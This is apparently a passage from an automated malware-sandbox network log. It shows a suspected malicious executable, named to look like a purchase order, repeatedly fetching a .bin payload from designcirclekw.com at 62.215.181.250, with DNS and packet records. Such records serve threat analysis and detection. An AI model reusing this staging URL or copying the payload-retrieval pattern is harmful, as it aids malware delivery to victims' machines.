                                                                    Oct 29, 2024 20:38:46.663707972 CET50011443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:46.664135933 CET50011443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:46.664146900 CET4435001162.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:46.664319992 CET50011443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:46.664325953 CET4435001162.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:47.477027893 CET4435001162.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:47.477111101 CET4435001162.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:47.477135897 CET50011443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:47.477164984 CET50011443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:47.477200985 CET50011443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:47.477216005 CET4435001162.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:47.477233887 CET50011443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:47.477258921 CET50011443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:47.586862087 CET50012443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:47.586916924 CET4435001262.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:47.587008953 CET50012443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:47.587363958 CET50012443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:47.587374926 CET4435001262.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:48.575726032 CET4435001262.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:48.575845003 CET50012443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:48.576622963 CET50012443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:48.576637030 CET4435001262.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:48.576837063 CET50012443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:48.576841116 CET4435001262.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:49.486782074 CET4435001262.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:49.487068892 CET50012443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:49.487092018 CET4435001262.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:49.487112999 CET50012443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:49.487127066 CET4435001262.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:49.487138987 CET50012443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:49.487179995 CET50012443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:49.603017092 CET50013443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:49.603074074 CET4435001362.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:49.603158951 CET50013443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:49.603481054 CET50013443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:49.603492975 CET4435001362.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:50.592967987 CET4435001362.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:50.593096972 CET50013443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:50.593496084 CET50013443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:50.593507051 CET4435001362.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:50.593671083 CET50013443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:50.593676090 CET4435001362.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:51.395661116 CET4435001362.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:51.395730972 CET4435001362.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:51.395807981 CET50013443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:51.395826101 CET50013443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:51.396054983 CET50013443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:51.396054983 CET50013443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:51.396073103 CET4435001362.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:51.397275925 CET50013443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:51.510195017 CET50014443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:51.510242939 CET4435001462.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:51.510310888 CET50014443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:51.510587931 CET50014443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:51.510603905 CET4435001462.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:52.504898071 CET4435001462.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:52.504996061 CET50014443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:52.505542994 CET50014443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:52.505548954 CET4435001462.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:52.505717993 CET50014443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:52.505722046 CET4435001462.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:53.304645061 CET4435001462.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:53.304728031 CET50014443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:53.304845095 CET4435001462.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:53.304884911 CET50014443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:53.304924965 CET4435001462.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:53.304992914 CET50014443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:53.313100100 CET50014443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:53.313129902 CET4435001462.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:53.313143015 CET50014443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:53.313178062 CET50014443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:53.431027889 CET50015443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:53.431101084 CET4435001562.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:53.431188107 CET50015443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:53.431457996 CET50015443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:53.431473017 CET4435001562.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:54.480894089 CET4435001562.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:54.481018066 CET50015443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:54.499931097 CET50015443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:54.499954939 CET4435001562.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:54.500137091 CET50015443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:54.500142097 CET4435001562.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:55.324460983 CET4435001562.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:55.324572086 CET50015443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:55.324750900 CET50015443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:55.324801922 CET4435001562.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:55.324852943 CET50015443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:55.431075096 CET50016443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:55.431144953 CET4435001662.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:55.431266069 CET50016443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:55.431694031 CET50016443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:55.431704044 CET4435001662.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:56.421823025 CET4435001662.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:56.421967030 CET50016443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:56.423122883 CET50016443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:56.423152924 CET4435001662.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:56.423305988 CET50016443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:56.423336983 CET4435001662.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:57.221442938 CET4435001662.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:57.221502066 CET50016443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:57.221640110 CET4435001662.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:57.221677065 CET50016443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:57.221704006 CET4435001662.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:57.221743107 CET50016443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:57.233846903 CET50016443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:57.233866930 CET4435001662.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:57.233887911 CET50016443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:57.233915091 CET50016443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:57.353060961 CET50017443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:57.353106022 CET4435001762.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:57.353193998 CET50017443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:57.353627920 CET50017443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:57.353636980 CET4435001762.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:58.336117029 CET4435001762.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:58.336359024 CET50017443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:58.336757898 CET50017443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:38:58.336771011 CET4435001762.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:38:58.336930037 CET50017443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:25.170238018 CET4435003162.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:26.191731930 CET4435003162.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:26.191888094 CET50031443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:26.192784071 CET50031443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:26.192799091 CET4435003162.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:26.192965031 CET50031443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:26.192970991 CET4435003162.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:27.014460087 CET4435003162.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:27.014517069 CET50031443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:27.014533043 CET4435003162.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:27.014578104 CET50031443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:29.695516109 CET50031443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:29.695570946 CET4435003162.215.181.250192.168.2.8
                                                                    Oct 29, 2024 20:39:29.695588112 CET50031443192.168.2.862.215.181.250
                                                                    Oct 29, 2024 20:39:29.695621967 CET50031443192.168.2.862.215.181.250
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 29, 2024 20:37:33.382989883 CET | 58652 | 53 | 192.168.2.8 | 1.1.1.1
Oct 29, 2024 20:37:33.418777943 CET | 53 | 58652 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 29, 2024 20:37:33.382989883 CET | 192.168.2.8 | 1.1.1.1 | 0x56b7 | Standard query (0) | designcirclekw.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 29, 2024 20:37:33.418777943 CET | 1.1.1.1 | 192.168.2.8 | 0x56b7 | No error (0) | designcirclekw.com | | 62.215.181.250 | A (IP address) | IN (0x0001) | false
                                                                    • designcirclekw.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49976 | 62.215.181.250 | 443 | 5784 | C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 19:37:34 UTC | 221 | OUT | GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: designcirclekw.com
Cache-Control: no-cache
2024-10-29 19:37:35 UTC | 217 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 19:37:35 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
X-Powered-By: PHP/7.0.33
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49977 | 62.215.181.250 | 443 | 5784 | C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 19:37:36 UTC | 221 | OUT | GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: designcirclekw.com
Cache-Control: no-cache
2024-10-29 19:37:37 UTC | 217 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 19:37:37 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
X-Powered-By: PHP/7.0.33
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49978 | 62.215.181.250 | 443 | 5784 | C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 19:37:38 UTC | 221 | OUT | GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: designcirclekw.com
Cache-Control: no-cache
2024-10-29 19:37:39 UTC | 217 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 19:37:39 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
X-Powered-By: PHP/7.0.33
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49979 | 62.215.181.250 | 443 | 5784 | C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 19:37:40 UTC | 221 | OUT | GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: designcirclekw.com
Cache-Control: no-cache
2024-10-29 19:37:41 UTC | 217 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 19:37:40 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
X-Powered-By: PHP/7.0.33
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49980 | 62.215.181.250 | 443 | 5784 | C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 19:37:42 UTC | 221 | OUT | GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: designcirclekw.com
Cache-Control: no-cache
2024-10-29 19:37:43 UTC | 217 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 19:37:42 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
X-Powered-By: PHP/7.0.33
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 49981 | 62.215.181.250 | 443 | 5784 | C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 19:37:44 UTC | 221 | OUT | GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: designcirclekw.com
Cache-Control: no-cache
2024-10-29 19:37:45 UTC | 217 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 19:37:44 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
X-Powered-By: PHP/7.0.33
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.8 | 49982 | 62.215.181.250 | 443 | 5784 | C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 19:37:46 UTC | 221 | OUT | GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: designcirclekw.com
Cache-Control: no-cache
2024-10-29 19:37:47 UTC | 217 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 19:37:46 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
X-Powered-By: PHP/7.0.33
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.8 | 49983 | 62.215.181.250 | 443 | 5784 | C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 19:37:48 UTC | 221 | OUT | GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: designcirclekw.com
Cache-Control: no-cache
2024-10-29 19:37:49 UTC | 217 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 19:37:48 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
X-Powered-By: PHP/7.0.33
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.8 | 49984 | 62.215.181.250 | 443 | 5784 | C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 19:37:50 UTC | 221 | OUT | GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: designcirclekw.com
Cache-Control: no-cache
2024-10-29 19:37:51 UTC | 217 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 19:37:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
X-Powered-By: PHP/7.0.33
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.8 | 49985 | 62.215.181.250 | 443 | 5784 | C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 19:37:52 UTC | 221 | OUT | GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: designcirclekw.com
Cache-Control: no-cache
2024-10-29 19:37:53 UTC | 217 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 19:37:52 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
X-Powered-By: PHP/7.0.33
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.8 | 49986 | 62.215.181.250 | 443 | 5784 | C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 19:37:54 UTC | 221 | OUT | GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: designcirclekw.com
Cache-Control: no-cache
2024-10-29 19:37:55 UTC | 217 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 19:37:54 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
X-Powered-By: PHP/7.0.33
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.8 | 49987 | 62.215.181.250 | 443 | 5784 | C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 19:37:56 UTC | 221 | OUT | GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: designcirclekw.com
Cache-Control: no-cache
2024-10-29 19:37:57 UTC | 217 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 19:37:56 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
X-Powered-By: PHP/7.0.33
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.8 | 49988 | 62.215.181.250 | 443 | 5784 | C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 19:37:58 UTC | 221 | OUT | GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: designcirclekw.com
Cache-Control: no-cache
2024-10-29 19:37:59 UTC | 217 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 19:37:58 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
X-Powered-By: PHP/7.0.33
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.8 | 49989 | 62.215.181.250 | 443 | 5784 | C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 19:38:00 UTC | 221 | OUT | GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: designcirclekw.com
Cache-Control: no-cache
2024-10-29 19:38:01 UTC | 217 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 19:38:00 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
X-Powered-By: PHP/7.0.33
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.8 | 49990 | 62.215.181.250 | 443 | 5784 | C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 19:38:02 UTC | 221 | OUT | GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: designcirclekw.com
Cache-Control: no-cache
2024-10-29 19:38:03 UTC | 217 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 19:38:02 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
X-Powered-By: PHP/7.0.33
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.8 | 49991 | 62.215.181.250 | 443 | 5784 | C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 19:38:05 UTC | 221 | OUT | GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: designcirclekw.com
Cache-Control: no-cache
2024-10-29 19:38:06 UTC | 217 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 19:38:05 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
X-Powered-By: PHP/7.0.33
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.8 | 49992 | 62.215.181.250 | 443 | 5784 | C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 19:38:07 UTC | 221 | OUT | GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: designcirclekw.com
Cache-Control: no-cache
2024-10-29 19:38:08 UTC | 217 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 19:38:07 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
X-Powered-By: PHP/7.0.33
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
17          192.168.2.8  49993        62.215.181.250  443               5784  C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-29 19:38:09 UTC  221                OUT        GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                       Host: designcirclekw.com
                                                       Cache-Control: no-cache
2024-10-29 19:38:10 UTC  217                IN         HTTP/1.1 200 OK
                                                       Date: Tue, 29 Oct 2024 19:38:09 GMT
                                                       Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                       X-Powered-By: PHP/7.0.33
                                                       Content-Length: 0
                                                       Connection: close
                                                       Content-Type: text/html; charset=UTF-8


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
18          192.168.2.8  49994        62.215.181.250  443               5784  C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-29 19:38:11 UTC  221                OUT        GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                       Host: designcirclekw.com
                                                       Cache-Control: no-cache
2024-10-29 19:38:12 UTC  217                IN         HTTP/1.1 200 OK
                                                       Date: Tue, 29 Oct 2024 19:38:11 GMT
                                                       Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                       X-Powered-By: PHP/7.0.33
                                                       Content-Length: 0
                                                       Connection: close
                                                       Content-Type: text/html; charset=UTF-8


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
19          192.168.2.8  49995        62.215.181.250  443               5784  C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-29 19:38:13 UTC  221                OUT        GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                       Host: designcirclekw.com
                                                       Cache-Control: no-cache
2024-10-29 19:38:14 UTC  217                IN         HTTP/1.1 200 OK
                                                       Date: Tue, 29 Oct 2024 19:38:13 GMT
                                                       Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                       X-Powered-By: PHP/7.0.33
